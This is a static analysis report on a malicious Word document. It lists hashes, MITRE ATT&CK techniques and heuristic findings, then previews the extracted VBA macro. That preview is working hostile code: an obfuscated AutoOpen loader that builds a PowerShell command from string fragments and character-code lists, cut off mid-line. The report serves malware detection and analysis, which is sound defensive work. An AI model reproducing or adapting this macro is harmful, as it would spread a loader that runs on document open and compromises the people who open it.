Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04725e94998827c2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 219.8 KB
Created: 2018-06-21 21:31:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 283236adb19207dc1637459cb0b94ab0
SHA-1: 5a83c3cdd22d58410d984cf3f833cd1a1ae54153
SHA-256: 04725e94998827c2fe638c8e3644bce481ebdeb7bc4da2d2d0fe6ac5bd02286c
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, a common technique for executing code as soon as the document is opened. The macro uses a Shell() call, indicating an attempt to run an external command. Together these strongly suggest the document is designed to download and execute a second-stage payload.

Heuristics (6)

  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35353 bytes
SHA-256: 67ffe8d39d97f0549bc3c7b5f92d63e66c77344ef27cc244459558c1d0ad44f8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HsjUihYzWKIjQc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jYRBjUcCMF"
Function lpXoIL()
On Error Resume Next
RmTthY = (kzTZt * 17192 + 99224 * CInt(FZdAil - CDbl(42033)) * 23495 * Oct(58540))
votMjLK = "He" + "ll" + " " + Chr(34) + " $" + "( " + "sE"
fYhQj = (EFnmdw * 19155 + 82241 * CInt(SoYXKr - CDbl(21612)) * 52373 * Oct(80685))
SAFnauTKTE = "T-i" + "teM" + "  " + "'v" + "Ari" + "aBL" + "e:"
XKViE = (ZpiCAr * 38816 + 32264 * CInt(UnVNPI - CDbl(30409)) * 74824 * Oct(12388))
mMnlHkEhM = "ofs" + "' '" + "') " + Chr(34) + "+ " + "[St" + "RI" + "NG]"
lpXoIL = votMjLK + SAFnauTKTE + mMnlHkEhM
wzoTT = (zrIJU * 67802 + 44967 * CInt(rDHbou - CDbl(50869)) * 39032 * Oct(13957))
End Function
Function dRibAN()
On Error Resume Next
pDqNaz = (XPWHz * 71080 + 42301 * CInt(iCALH - CDbl(37466)) * 72455 * Oct(31477))
OvkjkNNr = "( (" + " 53" + " ,"
WMBowM = (cqFdPd * 67711 + 33254 * CInt(BzUBb - CDbl(87896)) * 35836 * Oct(71797))
blDGzvZCO = "83" + " , " + "71" + " ,8" + "7," + " 12" + "7,"
GrZIz = (EnErN * 96332 + 36383 * CInt(CkfGi - CDbl(85416)) * 289 * Oct(8718))
nbVsT = "86," + " 1" + "00,"
jBFVR = (KctPc * 84855 + 41174 * CInt(TrqZb - CDbl(49319)) * 83848 * Oct(6992))
wFiVqcDBt = " 4" + "9 " + ", 4" + "4 ,"
iYRQw = (nsLBXq * 14327 + 87731 * CInt(mYtPTi - CDbl(81652)) * 62846 * Oct(63867))
tcBfiVARJ = " 49" + ",12" + "7, " + "116" + " ,1"
LPoTY = (cfpXwz * 97230 + 28239 * CInt(GWQqwV - CDbl(23486)) * 94965 * Oct(93848))
IpzIOVuY = "02" + " ,6" + "0,1"
dRibAN = OvkjkNNr + blDGzvZCO + nbVsT + wFiVqcDBt + tcBfiVARJ + IpzIOVuY
Djcjds = (krkXzZ * 75684 + 43895 * CInt(KRWwmZ - CDbl(59007)) * 48807 * Oct(26644))
End Function
Function imWDi()
On Error Resume Next
ZqjDz = (rjVwz * 92430 + 24275 * CInt(EPGiSG - CDbl(94230)) * 56295 * Oct(37679))
JrrXMKZp = "26" + ", " + "115" + ",12" + "3,1"
KuaAz = (BDVRSB * 2605 + 76934 * CInt(EHtSYv - CDbl(27991)) * 9495 * Oct(84070))
favhLNA = "16," + "11" + "4 " + ", "
XSAGGO = (WfsErr * 63753 + 84447 * CInt(wauMCO - CDbl(36418)) * 86244 * Oct(26549))
YcojLqicwE = "10" + "1 ," + "49" + ",99" + ",1" + "12 "
DLvHwp = (IcKBwO * 5931 + 42253 * CInt(VvjNPL - CDbl(50372)) * 52324 * Oct(98061))
tjildniYHw = ",12" + "7 " + ", 1" + "17," + " 12"
imWDi = JrrXMKZp + favhLNA + YcojLqicwE + tjildniYHw
JfoJAH = (HKlbYw * 28711 + 16032 * CInt(FhvALr - CDbl(81296)) * 45577 * Oct(85929))
End Function
Function WIrpr()
On Error Resume Next
MAjrk = (IHfDT * 36006 + 19971 * CInt(DHskDz - CDbl(96889)) * 34026 * Oct(9388))
kkPDrBTvMSt = "6 ," + " 1" + "24 " + ",4"
GsfwdS = (RQcvsX * 36215 + 804 * CInt(PojEP - CDbl(73813)) * 44498 * Oct(5157))
BBhcXsMORf = "2 " + ",53" + ", " + "126" + " , " + "93"
DzFTvZ = (vDlsoJ * 59142 + 26167 * CInt(CCizK - CDbl(69754)) * 49094 * Oct(69548))
zplbp = ",71" + ", 7" + "2 ," + " 1" + "01" + ",6"
hJiAQU = (cCZSj * 95109 + 40829 * CInt(AwUhI - CDbl(34983)) * 10864 * Oct(19507))
JQatb = "5," + "49" + " ," + " 4" + "4 ," + " 49"
qNkoE = (TZVWNP * 23163 + 91274 * CInt(QWMHFu - CDbl(59619)) * 8976 * Oct(63171))
pDSPUp = " ," + "127" + " ,1" + "16"
WIrpr = kkPDrBTvMSt + BBhcXsMORf + zplbp + JQatb + pDSPUp
wOQrci = (zMKCkj * 45535 + 30996 * CInt(sNaHm - CDbl(78684)) * 2476 * Oct(63650))
End Function
Function JtrzkWTjWi()
On Error Resume Next
lFzEa = (JDJIX * 5852 + 65891 * CInt(slQzlk - CDbl(62190)) * 81103 * Oct(78310))
qDCfnskG = ", 1" + "02" + " ," + "60" + " ,"
wCRiZs = (MjaqY * 58153 + 89279 * CInt(ztjXPs - CDbl(6193)) * 19963 * Oct(39420))
ZCccOtiJ = " 12" + "6," + " 1" + "15" + " , " + "12"
WWpPwk = (RGFYuf * 58126 + 32365 * CInt(LTHCT - CDbl(13893)) * 42661 * Oct(24705))
zmriqhELc = "3 " + ",11" + "6,1"
qzTZzv = (wwDWSw * 73811 + 79778 * CInt(HXoOEO - CDbl(4827)) * 12077 * Oct(29960))
wzQkjwDDK = "14 " + ",10" + "1 ," + "49" + ", " + "66 " + ", 1"
jCROOA = (dFlcsG * 19653 + 62112 
... (truncated)